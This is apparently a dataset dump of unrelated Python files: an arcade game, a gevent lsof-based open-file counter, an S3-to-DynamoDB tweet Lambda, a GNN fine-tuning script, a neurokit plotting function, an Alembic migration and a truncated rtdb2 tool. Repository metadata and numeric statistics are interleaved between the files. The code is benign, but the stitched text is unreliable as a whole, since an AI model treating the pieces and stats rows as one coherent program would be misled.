self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite,
self.rooms[self.current_room].wall_list)
self.player_sprite.center_x = 0
elif self.player_sprite.center_x < 0 and self.current_room == 1:
self.current_room = 0
self.physics_engine = arcade.PhysicsEngineSimple(self.player_sprite,
self.rooms[self.current_room].wall_list)
self.player_sprite.center_x = SCREEN_WIDTH
hit_list = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].coin_list)
hit_list2 = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].bigpotion_list)
hit_list3 = arcade.check_for_collision_with_list(self.player_sprite,self.rooms[self.current_room].smallpotion_list)
for coin in hit_list:
coin.kill()
self.score += 1
my_sound = arcade.load_sound("coinsound.wav")
arcade.play_sound(my_sound)
if self.score == 4:
for i in self.rooms[self.current_room].door_list:
i.kill()
your_sound = arcade.load_sound("door.wav")
arcade.play_sound(your_sound)
for smallpotion in hit_list3:
smallpotion.kill()
self.player_sprite.scale=0.5
tu_sound = arcade.load_sound("shrink.wav")
arcade.play_sound(tu_sound)
for bigpotion in hit_list2:
bigpotion.kill()
self.player_sprite.scale=1
yo_sound = arcade.load_sound("grow.wav")
arcade.play_sound(yo_sound)
def main():
""" Main method """
window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)
window.setup()
arcade.run()
if __name__ == "__main__":
main()
| 36.324219
| 124
| 0.614367
| 2,439
| 18,598
| 4.481755
| 0.113161
| 0.090568
| 0.051596
| 0.075016
| 0.710457
| 0.682737
| 0.658311
| 0.613942
| 0.605709
| 0.586955
| 0
| 0.016981
| 0.29073
| 18,598
| 512
| 125
| 36.324219
| 0.81169
| 0.105495
| 0
| 0.604046
| 0
| 0
| 0.049861
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028902
| false
| 0
| 0.00578
| 0
| 0.046243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe916e74f3d8c5dd73c18e07f1aa14f15ee3d8d0
| 4,869
|
py
|
Python
|
venv/lib/python3.6/site-packages/gevent/testing/openfiles.py
|
Guillaume-Fernandez/phishfinder
|
b459a30202fd5dfb1340b43c70363705de7cedd9
|
[
"MIT"
] | 10
|
2021-03-23T03:46:19.000Z
|
2022-03-08T07:20:25.000Z
|
venv/lib/python3.6/site-packages/gevent/testing/openfiles.py
|
Guillaume-Fernandez/phishfinder
|
b459a30202fd5dfb1340b43c70363705de7cedd9
|
[
"MIT"
] | 7
|
2021-05-21T16:51:48.000Z
|
2022-03-12T00:50:26.000Z
|
venv/lib/python3.6/site-packages/gevent/testing/openfiles.py
|
Guillaume-Fernandez/phishfinder
|
b459a30202fd5dfb1340b43c70363705de7cedd9
|
[
"MIT"
] | 4
|
2021-04-21T00:49:34.000Z
|
2021-11-21T09:18:29.000Z
|
# Copyright (c) 2018 gevent community
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import absolute_import, print_function, division
import os
import unittest
import re
from . import sysinfo
# Linux/OS X/BSD platforms can implement this by calling out to lsof
if sysinfo.WIN:
def _run_lsof():
raise unittest.SkipTest("lsof not expected on Windows")
else:
def _run_lsof():
import tempfile
pid = os.getpid()
fd, tmpname = tempfile.mkstemp('get_open_files')
os.close(fd)
lsof_command = 'lsof -p %s > %s' % (pid, tmpname)
if os.system(lsof_command):
# XXX: This prints to the console an annoying message: 'lsof is not recognized'
raise unittest.SkipTest("lsof failed")
with open(tmpname) as fobj:
data = fobj.read().strip()
os.remove(tmpname)
return data
def default_get_open_files(pipes=False):
data = _run_lsof()
results = {}
for line in data.split('\n'):
line = line.strip()
if not line or line.startswith("COMMAND"):
# Skip header and blank lines
continue
split = re.split(r'\s+', line)
_command, _pid, _user, fd = split[:4]
# Pipes (on OS X, at least) get an fd like "3" while normal files get an fd like "1u"
if fd[:-1].isdigit() or fd.isdigit():
if not pipes and fd[-1].isdigit():
continue
fd = int(fd[:-1]) if not fd[-1].isdigit() else int(fd)
if fd in results:
params = (fd, line, split, results.get(fd), data)
raise AssertionError('error when parsing lsof output: duplicate fd=%r\nline=%r\nsplit=%r\nprevious=%r\ndata:\n%s' % params)
results[fd] = line
if not results:
raise AssertionError('failed to parse lsof:\n%s' % (data, ))
results['data'] = data
return results
def default_get_number_open_files():
if os.path.exists('/proc/'):
# Linux only
fd_directory = '/proc/%d/fd' % os.getpid()
return len(os.listdir(fd_directory))
try:
return len(get_open_files(pipes=True)) - 1
except (OSError, AssertionError, unittest.SkipTest):
return 0
lsof_get_open_files = default_get_open_files
try:
# psutil import subprocess which on Python 3 imports selectors.
# This can expose issues with monkey-patching.
import psutil
except ImportError:
get_open_files = default_get_open_files
get_number_open_files = default_get_number_open_files
else:
# If psutil is available (it is cross-platform) use that.
# It is *much* faster than shelling out to lsof each time
# (Running 14 tests takes 3.964s with lsof and 0.046 with psutil)
# However, it still doesn't completely solve the issue on Windows: fds are reported
# as -1 there, so we can't fully check those.
def get_open_files():
"""
Return a list of popenfile and pconn objects.
Note that other than `fd`, they have different attributes.
.. important:: If you want to find open sockets, on Windows
and linux, it is important that the socket at least be listening
(socket.listen(1)). Unlike the lsof implementation, this will only
return sockets in a state like that.
"""
results = dict()
process = psutil.Process()
results['data'] = process.open_files() + process.connections('all')
for x in results['data']:
results[x.fd] = x
results['data'] += ['From psutil', process]
return results
def get_number_open_files():
process = psutil.Process()
try:
return process.num_fds()
except AttributeError:
# num_fds is unix only. Is num_handles close enough on Windows?
return 0
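# --- Illustrative usage (not part of the original module) ---
# A minimal sketch, assuming these helpers are used from a test module, of how a
# file-descriptor leak check could look. The test case below is a hypothetical
# example, not taken from the original code.
class _ExampleFdLeakTest(unittest.TestCase):
    def test_open_and_close_leaks_nothing(self):
        before = get_number_open_files()
        with open(__file__) as f:  # open and close an ordinary file
            f.read()
        self.assertEqual(before, get_number_open_files())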
| 38.642857
| 139
| 0.657835
| 683
| 4,869
| 4.606149
| 0.401171
| 0.03719
| 0.030515
| 0.022886
| 0.035601
| 0.019708
| 0.019708
| 0
| 0
| 0
| 0
| 0.007448
| 0.255494
| 4,869
| 125
| 140
| 38.952
| 0.860414
| 0.439721
| 0
| 0.211268
| 0
| 0.014085
| 0.09191
| 0.01823
| 0
| 0
| 0
| 0
| 0.042254
| 1
| 0.084507
| false
| 0
| 0.112676
| 0
| 0.309859
| 0.014085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe97b6953c22bb335b56638721adf4a720e34f5f
| 2,922
|
py
|
Python
|
FAUCovidCrawler/AWSLambda/lambda_function.py
|
Awannaphasch2016/CDKFAUCovid19Cralwer
|
a84d90612314cb4d4618da95238617a524b1b280
|
[
"MIT"
] | null | null | null |
FAUCovidCrawler/AWSLambda/lambda_function.py
|
Awannaphasch2016/CDKFAUCovid19Cralwer
|
a84d90612314cb4d4618da95238617a524b1b280
|
[
"MIT"
] | null | null | null |
FAUCovidCrawler/AWSLambda/lambda_function.py
|
Awannaphasch2016/CDKFAUCovid19Cralwer
|
a84d90612314cb4d4618da95238617a524b1b280
|
[
"MIT"
] | null | null | null |
'''
Original code contributor: mentzera
Article link: https://aws.amazon.com/blogs/big-data/building-a-near-real-time-discovery-platform-with-aws/
'''
import boto3
import json
import twitter_to_es
# from Examples.Demo.AWS_Related.TwitterStreamWithAWS.LambdaWithS3Trigger import \
# twitter_to_es
from tweet_utils import \
get_tweet, id_field, get_tweet_mapping
headers = {"Content-Type": "application/json"}
s3 = boto3.client('s3')
kinesis_client = boto3.client('kinesis')
# dynamoDb_client = boto3.client('dynamodb')
# Lambda execution starts here
def handler(event, context):
for record in event['Records']:
# Get the bucket name and key for the new file
bucket = record['s3']['bucket']['name']
key = record['s3']['object']['key']
# Get s3 object, read, and split the file into lines
try:
obj = s3.get_object(Bucket=bucket, Key=key)
except Exception as e:
print(e)
print(
'Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(
key, bucket))
raise e
# Parse s3 object content (JSON)
try:
# https://stackoverflow.com/questions/31976273/open-s3-object-as-a-string-with-boto3
s3_file_content = obj['Body'].read().decode('utf-8')
# clean trailing comma
if s3_file_content.endswith(',\n'):
s3_file_content = s3_file_content[:-2]
tweets_str = '[' + s3_file_content + ']'
# print(tweets_str)
tweets = json.loads(tweets_str)
except Exception as e:
print(e)
print('Error loading json from object {} in bucket {}'.format(key,
bucket))
raise e
for doc in tweets:
tweet = get_tweet(doc)
# print(tweet['sentiments'])
print(tweet)
print('===\n\n\n')
#=====================
#==send data to dynamoDB
#=====================
# Get the service resource.
dynamodb = boto3.resource('dynamodb')
# Instantiate a table resource object without actually
# creating a DynamoDB table. Note that the attributes of this table
# are lazy-loaded: a request is not made nor are the attribute
# values populated until the attributes
# on the table resource are accessed or its load() method is called.
table = dynamodb.Table('faucovidstream_twitter_with_sentiment')
# Print out some data about the table.
# This will cause a request to be made to DynamoDB and its attribute
# values will be set based on the response.
print(table.creation_date_time)
            # put_item lives on the Table resource, not on the dynamodb service resource
            table.put_item(
                Item=tweet
            )
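# --- Illustrative usage (not part of the original handler) ---
# A minimal sketch of invoking the handler locally with a hand-built S3 event.
# The bucket and key names are hypothetical; a real run also needs AWS
# credentials and the referenced object to actually exist in S3.
if __name__ == '__main__':
    sample_event = {
        'Records': [
            {
                's3': {
                    'bucket': {'name': 'example-tweet-bucket'},        # hypothetical bucket
                    'object': {'key': 'raw/tweets-2021-01-01.json'},   # hypothetical key
                }
            }
        ]
    }
    handler(sample_event, None)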
| 33.204545
| 142
| 0.589322
| 352
| 2,922
| 4.798295
| 0.454545
| 0.017762
| 0.038484
| 0.02013
| 0.089994
| 0.040261
| 0.040261
| 0.040261
| 0
| 0
| 0
| 0.014728
| 0.302875
| 2,922
| 87
| 143
| 33.586207
| 0.814433
| 0.380561
| 0
| 0.195122
| 0
| 0.02439
| 0.166854
| 0.020787
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.097561
| 0
| 0.121951
| 0.170732
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe9913a9a0d00104117bbc4e7f42cf9196b11854
| 8,791
|
py
|
Python
|
finetune/finetune.py
|
zaixizhang/MGSSL
|
fdb7e78bb927d735ed64dc78fb792adb13352e1c
|
[
"Apache-2.0"
] | 43
|
2021-10-15T01:11:36.000Z
|
2022-03-31T02:05:41.000Z
|
finetune/finetune.py
|
zaixizhang/MGSSL
|
fdb7e78bb927d735ed64dc78fb792adb13352e1c
|
[
"Apache-2.0"
] | 5
|
2021-12-09T08:07:22.000Z
|
2022-03-02T07:34:34.000Z
|
finetune/finetune.py
|
zaixizhang/MGSSL
|
fdb7e78bb927d735ed64dc78fb792adb13352e1c
|
[
"Apache-2.0"
] | 7
|
2021-11-23T01:15:36.000Z
|
2022-03-07T16:30:30.000Z
|
import argparse
from loader import MoleculeDataset
from torch_geometric.data import DataLoader
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from tqdm import tqdm
import numpy as np
from model import GNN, GNN_graphpred
from sklearn.metrics import roc_auc_score
from splitters import scaffold_split, random_split, random_scaffold_split  # random_scaffold_split is needed by the 'random_scaffold' split option below
import pandas as pd
import os
import shutil
from tensorboardX import SummaryWriter
criterion = nn.BCEWithLogitsLoss(reduction = "none")
def train(args, model, device, loader, optimizer):
model.train()
for step, batch in enumerate(tqdm(loader, desc="Iteration")):
batch = batch.to(device)
pred = model(batch.x, batch.edge_index, batch.edge_attr, batch.batch)
y = batch.y.view(pred.shape).to(torch.float64)
#Whether y is non-null or not.
is_valid = y**2 > 0
#Loss matrix
loss_mat = criterion(pred.double(), (y+1)/2)
#loss matrix after removing null target
loss_mat = torch.where(is_valid, loss_mat, torch.zeros(loss_mat.shape).to(loss_mat.device).to(loss_mat.dtype))
optimizer.zero_grad()
loss = torch.sum(loss_mat)/torch.sum(is_valid)
loss.backward()
optimizer.step()
def eval(args, model, device, loader):
model.eval()
y_true = []
y_scores = []
for step, batch in enumerate(tqdm(loader, desc="Iteration")):
batch = batch.to(device)
with torch.no_grad():
pred = model(batch.x, batch.edge_index, batch.edge_attr, batch.batch)
y_true.append(batch.y.view(pred.shape))
y_scores.append(pred)
y_true = torch.cat(y_true, dim = 0).cpu().numpy()
y_scores = torch.cat(y_scores, dim = 0).cpu().numpy()
roc_list = []
for i in range(y_true.shape[1]):
#AUC is only defined when there is at least one positive data.
if np.sum(y_true[:,i] == 1) > 0 and np.sum(y_true[:,i] == -1) > 0:
is_valid = y_true[:,i]**2 > 0
roc_list.append(roc_auc_score((y_true[is_valid,i] + 1)/2, y_scores[is_valid,i]))
if len(roc_list) < y_true.shape[1]:
print("Some target is missing!")
print("Missing ratio: %f" %(1 - float(len(roc_list))/y_true.shape[1]))
return sum(roc_list)/len(roc_list) #y_true.shape[1]
def main():
# Training settings
parser = argparse.ArgumentParser(description='PyTorch implementation of pre-training of graph neural networks')
parser.add_argument('--device', type=int, default=0,
help='which gpu to use if any (default: 0)')
parser.add_argument('--batch_size', type=int, default=32,
help='input batch size for training (default: 32)')
parser.add_argument('--epochs', type=int, default=100,
help='number of epochs to train (default: 100)')
parser.add_argument('--lr', type=float, default=0.001,
help='learning rate (default: 0.001)')
parser.add_argument('--lr_scale', type=float, default=1,
help='relative learning rate for the feature extraction layer (default: 1)')
parser.add_argument('--decay', type=float, default=0,
help='weight decay (default: 0)')
parser.add_argument('--num_layer', type=int, default=5,
help='number of GNN message passing layers (default: 5).')
parser.add_argument('--emb_dim', type=int, default=300,
help='embedding dimensions (default: 300)')
parser.add_argument('--dropout_ratio', type=float, default=0.5,
help='dropout ratio (default: 0.5)')
parser.add_argument('--graph_pooling', type=str, default="mean",
help='graph level pooling (sum, mean, max, set2set, attention)')
parser.add_argument('--JK', type=str, default="last",
help='how the node features across layers are combined. last, sum, max or concat')
parser.add_argument('--gnn_type', type=str, default="gin")
parser.add_argument('--dataset', type=str, default = 'sider', help='root directory of dataset. For now, only classification.')
parser.add_argument('--input_model_file', type=str, default = '../motif_based_pretrain/saved_model/motif_pretrain.pth', help='filename to read the model (if there is any)')
parser.add_argument('--filename', type=str, default = '', help='output filename')
parser.add_argument('--seed', type=int, default=42, help = "Seed for splitting the dataset.")
parser.add_argument('--runseed', type=int, default=0, help = "Seed for minibatch selection, random initialization.")
parser.add_argument('--split', type = str, default="scaffold", help = "random or scaffold or random_scaffold")
parser.add_argument('--eval_train', type=int, default = 1, help='evaluating training or not')
parser.add_argument('--num_workers', type=int, default = 4, help='number of workers for dataset loading')
args = parser.parse_args()
torch.manual_seed(args.runseed)
np.random.seed(args.runseed)
device = torch.device("cuda:" + str(args.device)) if torch.cuda.is_available() else torch.device("cpu")
if torch.cuda.is_available():
torch.cuda.manual_seed_all(args.runseed)
#Bunch of classification tasks
if args.dataset == "tox21":
num_tasks = 12
elif args.dataset == "hiv":
num_tasks = 1
elif args.dataset == "pcba":
num_tasks = 128
elif args.dataset == "muv":
num_tasks = 17
elif args.dataset == "bace":
num_tasks = 1
elif args.dataset == "bbbp":
num_tasks = 1
elif args.dataset == "toxcast":
num_tasks = 617
elif args.dataset == "sider":
num_tasks = 27
elif args.dataset == "clintox":
num_tasks = 2
else:
raise ValueError("Invalid dataset name.")
#set up dataset
dataset = MoleculeDataset("dataset/" + args.dataset, dataset=args.dataset)
print(dataset)
if args.split == "scaffold":
smiles_list = pd.read_csv('dataset/' + args.dataset + '/processed/smiles.csv', header=None)[0].tolist()
train_dataset, valid_dataset, test_dataset = scaffold_split(dataset, smiles_list, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1)
print("scaffold")
elif args.split == "random":
train_dataset, valid_dataset, test_dataset = random_split(dataset, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1, seed = args.seed)
print("random")
elif args.split == "random_scaffold":
smiles_list = pd.read_csv('dataset/' + args.dataset + '/processed/smiles.csv', header=None)[0].tolist()
train_dataset, valid_dataset, test_dataset = random_scaffold_split(dataset, smiles_list, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1, seed = args.seed)
print("random scaffold")
else:
raise ValueError("Invalid split option.")
print(train_dataset[0])
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers = args.num_workers)
val_loader = DataLoader(valid_dataset, batch_size=args.batch_size, shuffle=False, num_workers = args.num_workers)
test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False, num_workers = args.num_workers)
#set up model
model = GNN_graphpred(args.num_layer, args.emb_dim, num_tasks, JK = args.JK, drop_ratio = args.dropout_ratio, graph_pooling = args.graph_pooling, gnn_type = args.gnn_type)
if not args.input_model_file == "":
model.from_pretrained(args.input_model_file)
model.to(device)
#set up optimizer
#different learning rate for different part of GNN
model_param_group = []
model_param_group.append({"params": model.gnn.parameters()})
if args.graph_pooling == "attention":
model_param_group.append({"params": model.pool.parameters(), "lr":args.lr*args.lr_scale})
model_param_group.append({"params": model.graph_pred_linear.parameters(), "lr":args.lr*args.lr_scale})
optimizer = optim.Adam(model_param_group, lr=args.lr, weight_decay=args.decay)
print(optimizer)
for epoch in range(1, args.epochs+1):
print("====epoch " + str(epoch))
train(args, model, device, train_loader, optimizer)
print("====Evaluation")
if args.eval_train:
train_acc = eval(args, model, device, train_loader)
else:
print("omit the training accuracy computation")
train_acc = 0
val_acc = eval(args, model, device, val_loader)
test_acc = eval(args, model, device, test_loader)
print("train: %f val: %f test: %f" %(train_acc, val_acc, test_acc))
if __name__ == "__main__":
main()
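# Illustrative invocation (not part of the original script); it assumes the dataset
# files exist under ./dataset/<name>/ and that the pretrained model path is valid:
#   python finetune.py --dataset sider --split scaffold --batch_size 32 --epochs 100 \
#       --input_model_file ../motif_based_pretrain/saved_model/motif_pretrain.pth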
| 42.674757
| 176
| 0.657604
| 1,214
| 8,791
| 4.594728
| 0.21911
| 0.03227
| 0.060954
| 0.013625
| 0.280925
| 0.219433
| 0.189315
| 0.148082
| 0.148082
| 0.148082
| 0
| 0.015582
| 0.21158
| 8,791
| 205
| 177
| 42.882927
| 0.789208
| 0.033216
| 0
| 0.090909
| 0
| 0
| 0.179783
| 0.01131
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019481
| false
| 0.006494
| 0.103896
| 0
| 0.12987
| 0.077922
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe99a748e2fcbf259f6611afd0ca5930032c99b6
| 5,703
|
py
|
Python
|
neurokit2/signal/signal_plot.py
|
gutierrezps/NeuroKit
|
a30f76e64b4108abdc652a20391dc0288c62501d
|
[
"MIT"
] | 1
|
2022-03-20T21:09:34.000Z
|
2022-03-20T21:09:34.000Z
|
neurokit2/signal/signal_plot.py
|
Lei-I-Zhang/NeuroKit
|
a30f76e64b4108abdc652a20391dc0288c62501d
|
[
"MIT"
] | null | null | null |
neurokit2/signal/signal_plot.py
|
Lei-I-Zhang/NeuroKit
|
a30f76e64b4108abdc652a20391dc0288c62501d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from ..events import events_plot
from ..stats import standardize as nk_standardize
def signal_plot(
signal, sampling_rate=None, subplots=False, standardize=False, labels=None, **kwargs
):
"""Plot signal with events as vertical lines.
Parameters
----------
signal : array or DataFrame
Signal array (can be a dataframe with many signals).
sampling_rate : int
The sampling frequency of the signal (in Hz, i.e., samples/second). Needs to be supplied if
the data should be plotted over time in seconds. Otherwise the data is plotted over samples.
Defaults to None.
subplots : bool
If True, each signal is plotted in a subplot.
standardize : bool
If True, all signals will have the same scale (useful for visualisation).
labels : str or list
Defaults to None.
**kwargs : optional
Arguments passed to matplotlib plotting.
Examples
----------
>>> import numpy as np
>>> import pandas as pd
>>> import neurokit2 as nk
>>>
>>> signal = nk.signal_simulate(duration=10, sampling_rate=1000)
>>> nk.signal_plot(signal, sampling_rate=1000, color="red")
>>>
>>> data = pd.DataFrame({"Signal2": np.cos(np.linspace(start=0, stop=20, num=1000)),
... "Signal3": np.sin(np.linspace(start=0, stop=20, num=1000)),
... "Signal4": nk.signal_binarize(np.cos(np.linspace(start=0, stop=40, num=1000)))})
>>> nk.signal_plot(data, labels=['signal_1', 'signal_2', 'signal_3'], subplots=True)
>>> nk.signal_plot([signal, data], standardize=True)
"""
# Sanitize format
if isinstance(signal, list):
try:
for i in signal:
len(i)
except TypeError:
signal = np.array(signal)
if isinstance(signal, pd.DataFrame) is False:
# If list is passed
if isinstance(signal, list) or len(np.array(signal).shape) > 1:
out = pd.DataFrame()
for i, content in enumerate(signal):
if isinstance(content, (pd.DataFrame, pd.Series)):
out = pd.concat([out, content], axis=1, sort=True)
else:
out = pd.concat(
[out, pd.DataFrame({"Signal" + str(i + 1): content})],
axis=1,
sort=True,
)
signal = out
# If vector is passed
else:
signal = pd.DataFrame({"Signal": signal})
# Copy signal
signal = signal.copy()
# Guess continuous and events columns
continuous_columns = list(signal.columns.values)
events_columns = []
for col in signal.columns:
vector = signal[col]
if vector.nunique() == 2:
indices = np.where(vector == np.max(vector.unique()))
if bool(np.any(np.diff(indices) == 1)) is False:
events_columns.append(col)
continuous_columns.remove(col)
# Adjust for sampling rate
if sampling_rate is not None:
signal.index = signal.index / sampling_rate
title_x = "Time (seconds)"
else:
title_x = "Time"
# x_axis = np.linspace(0, signal.shape[0] / sampling_rate, signal.shape[0])
# x_axis = pd.DataFrame(x_axis, columns=["Time (s)"])
# signal = pd.concat([signal, x_axis], axis=1)
# signal = signal.set_index("Time (s)")
# Plot accordingly
if len(events_columns) > 0:
events = []
for col in events_columns:
vector = signal[col]
events.append(np.where(vector == np.max(vector.unique()))[0])
plot = events_plot(events, signal=signal[continuous_columns])
if sampling_rate is None and signal.index.is_integer():
plot.gca().set_xlabel("Samples")
else:
plot.gca().set_xlabel(title_x)
else:
# Aesthetics
colors = [
"#1f77b4",
"#ff7f0e",
"#2ca02c",
"#d62728",
"#9467bd",
"#8c564b",
"#e377c2",
"#7f7f7f",
"#bcbd22",
"#17becf",
]
if len(continuous_columns) > len(colors):
colors = plt.cm.viridis(np.linspace(0, 1, len(continuous_columns)))
# Plot
if standardize is True:
signal[continuous_columns] = nk_standardize(signal[continuous_columns])
if subplots is True:
_, axes = plt.subplots(nrows=len(continuous_columns), ncols=1, sharex=True, **kwargs)
for ax, col, color in zip(axes, continuous_columns, colors):
ax.plot(signal[col], c=color, **kwargs)
else:
plot = signal[continuous_columns].plot(subplots=False, sharex=True, **kwargs)
if sampling_rate is None and signal.index.is_integer():
plt.xlabel("Samples")
else:
plt.xlabel(title_x)
# Tidy legend locations and add labels
if labels is None:
labels = continuous_columns.copy()
if isinstance(labels, str):
n_labels = len([labels])
labels = [labels]
elif isinstance(labels, list):
n_labels = len(labels)
if len(signal[continuous_columns].columns) != n_labels:
raise ValueError(
"NeuroKit error: signal_plot(): number of labels does not equal the number of plotted signals."
)
if subplots is False:
plt.legend(labels, loc=1)
else:
for i, label in enumerate(labels):
axes[i].legend([label], loc=1)
| 33.946429
| 109
| 0.57198
| 681
| 5,703
| 4.707783
| 0.270191
| 0.063631
| 0.03587
| 0.014972
| 0.122271
| 0.092327
| 0.092327
| 0.064255
| 0.026825
| 0.026825
| 0
| 0.022606
| 0.309662
| 5,703
| 167
| 110
| 34.149701
| 0.79172
| 0.307733
| 0
| 0.123711
| 0
| 0
| 0.054445
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010309
| false
| 0
| 0.051546
| 0
| 0.061856
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe9d9591df2f2c4858eb64ae4def8e712c9e40a0
| 1,183
|
py
|
Python
|
migrations/versions/1a89721126f7_only_one_validation_per_mission_user_.py
|
MTES-MCT/mobilic-api
|
b3754de2282262fd60a27dc90e40777df9c1e230
|
[
"MIT"
] | null | null | null |
migrations/versions/1a89721126f7_only_one_validation_per_mission_user_.py
|
MTES-MCT/mobilic-api
|
b3754de2282262fd60a27dc90e40777df9c1e230
|
[
"MIT"
] | 8
|
2021-04-19T17:47:55.000Z
|
2022-02-16T17:40:18.000Z
|
migrations/versions/1a89721126f7_only_one_validation_per_mission_user_.py
|
MTES-MCT/mobilic-api
|
b3754de2282262fd60a27dc90e40777df9c1e230
|
[
"MIT"
] | null | null | null |
"""Only one validation per mission, user and actor
Revision ID: 1a89721126f7
Revises: fa96dfc8237d
Create Date: 2021-10-14 11:22:01.124488
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "1a89721126f7"
down_revision = "fa96dfc8237d"
branch_labels = None
depends_on = None
def upgrade():
op.execute(
"""
WITH validation_duplicates AS (
SELECT
id,
ROW_NUMBER() OVER (PARTITION BY user_id, mission_id, submitter_id ORDER BY reception_time DESC) AS rn
FROM mission_validation
)
DELETE FROM mission_validation mv
USING validation_duplicates vd
WHERE mv.id = vd.id AND vd.rn >= 2
"""
)
op.execute(
"""
ALTER TABLE mission_validation ADD CONSTRAINT only_one_validation_per_submitter_mission_and_user
EXCLUDE USING GIST (
mission_id WITH =,
submitter_id WITH =,
user_id WITH =
)
"""
)
def downgrade():
op.drop_constraint(
"only_one_validation_per_submitter_mission_and_user",
"mission_validation",
)
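# Illustrative usage (not part of the migration itself): with Alembic configured
# for this project, the revision can be applied and rolled back with the standard
# commands, using the revision identifiers declared above:
#   alembic upgrade 1a89721126f7
#   alembic downgrade fa96dfc8237d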
| 23.66
| 117
| 0.633136
| 138
| 1,183
| 5.195652
| 0.492754
| 0.09484
| 0.07113
| 0.083682
| 0.147838
| 0.147838
| 0.147838
| 0.147838
| 0.147838
| 0
| 0
| 0.063855
| 0.298394
| 1,183
| 49
| 118
| 24.142857
| 0.8
| 0.148774
| 0
| 0.125
| 0
| 0
| 0.250681
| 0.13624
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.125
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe9dfa2f69a678e6192380ed28bf692cc55ff822
| 1,979
|
py
|
Python
|
packages/facilities/rtdb/python/rtdb2_get.py
|
Falcons-Robocup/code
|
2281a8569e7f11cbd3238b7cc7341c09e2e16249
|
[
"Apache-2.0"
] | 2
|
2021-01-15T13:27:19.000Z
|
2021-08-04T08:40:52.000Z
|
packages/facilities/rtdb/python/rtdb2_get.py
|
Falcons-Robocup/code
|
2281a8569e7f11cbd3238b7cc7341c09e2e16249
|
[
"Apache-2.0"
] | null | null | null |
packages/facilities/rtdb/python/rtdb2_get.py
|
Falcons-Robocup/code
|
2281a8569e7f11cbd3238b7cc7341c09e2e16249
|
[
"Apache-2.0"
] | 5
|
2018-05-01T10:39:31.000Z
|
2022-03-25T03:02:35.000Z
|
#!/usr/bin/python
# Copyright 2020 Jan Feitsma (Falcons)
# SPDX-License-Identifier: Apache-2.0
import os
import sys
import argparse
from rtdb2 import RtDB2Store, RTDB2_DEFAULT_PATH
import rtdb2tools
from hexdump import hexdump
# Main structure of the program
if __name__ == "__main__":
# Argument parsing.
descriptionTxt = 'This tool reads a value from the database given an RtDB key.\n'
exampleTxt = """Example: rtdb2_get.py -a 6 ROBOT_STATE
age: 2h
shared: True
list: False
